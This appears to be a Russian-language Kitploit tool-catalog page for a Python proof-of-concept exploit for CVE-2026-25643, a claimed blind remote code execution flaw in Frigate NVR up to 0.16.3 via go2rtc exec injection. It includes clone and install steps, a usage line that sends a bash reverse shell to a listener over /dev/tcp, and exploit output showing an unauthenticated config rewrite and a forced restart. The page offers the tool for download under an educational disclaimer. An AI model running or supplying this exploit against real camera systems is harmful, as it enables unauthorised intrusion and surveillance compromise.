Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-25643 — CVE-2026-25643: Frigate ≤0.16.3 — слепое удалённое выполнение кода (RCE) через инъекцию exec в go2rtc | Kitploit
Инструменты/GitHubGitHub/joshuavanderpoll/cve-2026-25643
ЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubjoshuavanderpoll/cve-2026-25643

CVE-2026-25643

CVE-2026-25643: Frigate ≤0.16.3 — слепое удалённое выполнение кода (RCE) через инъекцию exec в go2rtc

Репозиторий
75 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Сайт

Frigate NVR ≤ 0.16.3 — слепой RCE-эксплойт (CVE-2026-25643) PoC

Python

📜 Описание

Этот эксплойт на Python направлен на критическую уязвимость манипуляции конфигурацией в Frigate NVR версий до 0.16.3 (как с аутентификацией, так и без неё). Внедряя вредоносный поток go2rtc и фиктивную запись камеры, он вызывает выполнение произвольных команд от имени процесса Frigate во время перезапуска службы — без необходимости в reverse shell или перехвате вывода.

🛠️ Установка

[!NOTE] Чтобы обеспечить чистое и изолированное окружение для зависимостей проекта, рекомендуется использовать модуль venv из Python.

OSX/Linux

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python3 -m venv .venv
source .venv/bin/activate
pip3 install -r requirements.txt

Windows

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2026-25643.git
cd CVE-2026-25643
python -m venv .venv 
.venv\Scripts\activate
pip3 install -r requirements.txt

⚙️ Использование

root@kitploit:~
python3 CVE-2026-25643.py -c "bash -i >& /dev/tcp/host.docker.internal/1111 0>&1" --url http://localhost:5001/

 Target : http://localhost:5001
 Command: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1

[!] No credentials provided → attempting unauthenticated access
[*] Fetching current configuration (/api/config/raw) ...
[*] Config fetch → HTTP 200
[*] Received 914 bytes
[*] Config was JSON-wrapped → unwrapped
[+] Config parsed successfully (7 top-level keys)
[*] Preparing payload → executing: bash -i >& /dev/tcp/host.docker.internal/1111 0>&1
[*] Using payload: bash -c 'bash -i >& /dev/tcp/host.docker.internal/1111 0>&1'
[+] Injected malicious stream → debug_cmd
[+] Injected trigger camera → trigger_exec
[*] Sending modified config (861 bytes) with option: restart
[*] Config save → HTTP 200
[+] Configuration accepted (server should restart)

============================================================
 Payload sent! Command should execute during go2rtc init / camera probe.
 Keep in mind:
 • Output is NOT captured (blind execution)
 • Command runs as the user/frigate process
 • Multiple executions may occur during restart
============================================================

🐋 Docker PoC

root@kitploit:~
cd docker/
docker compose down
docker compose up -d
# You can test at --url http://127.0.0.1:5001

💻 Пример

Execute PoC Receive connection

🕵🏼 Ссылки

  • Вдохновение от https://github.com/jduardo2704/CVE-2026-25643-Frigate-RCE

📢 Отказ от ответственности

Этот инструмент предоставлен только в образовательных и исследовательских целях. Автор не несёт ответственности за любое неправомерное использование или ущерб, причинённый инструментом.

Скачать инструмент